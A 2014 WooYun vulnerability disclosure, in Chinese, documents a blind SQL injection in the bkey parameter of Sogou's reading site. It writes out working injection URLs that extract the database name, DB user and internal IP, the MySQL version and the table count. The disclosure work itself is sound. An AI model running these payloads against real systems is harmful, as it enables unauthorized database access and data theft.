[公开漏洞]搜狗某站点存在SQL注入漏洞
-
来源:WooYun 浏览:614次 时间:2014-06-17
2014-06-12:细节已通知厂商并且等待厂商处理中
2014-06-17:厂商已经主动忽略漏洞,细节向公众公开
SQL,php字符类型盲注。
详细说明:存在问题的站点:http://yuedu.sogou.com
搜狗的阅读站点。
通过and 1=2 and 1=1返回不一进行盲注。
当:and 1=1时
http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6' and 1=1 and '1'='1
当:and 1=2时:
猜db长度
http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6' and (length(database())=3) and '1'='1
为3
进一步猜测database名:
http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20ascii
(substring(database(),1,1))%20=%20119)%20and%20%271%27=%271
第一个字为w
以此类推:
database()为wap。
进一步,猜测user()
http://yuedu.sogou.com/ajax/user/buy/?
bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(length%20(user())
=16)%20and%20%271%27=%271
长度为16
进一步猜解。得:wap@10.14.138.68
http://yuedu.sogou.com/ajax/user/buy/?
bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20ascii
(substring(version(),1,1))%20=%2053)%20and%20%271%27=%271
mysql版本5.0
http://yuedu.sogou.com/ajax/user/buy/?
bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6%27%20and%20(select%20count
(1)%20from%20information_schema.tables)=5232%20and%20%271%27=%271
居然有5232张表..
不继续了
过滤。
版权声明:转载请注明来源 梧桐雨@乌云 漏洞回应 厂商回应:危害等级:无影响厂商忽略
忽略时间:2014-06-12 10:38
厂商回复:漏洞Rank:15 (WooYun评价)
最新状态:暂无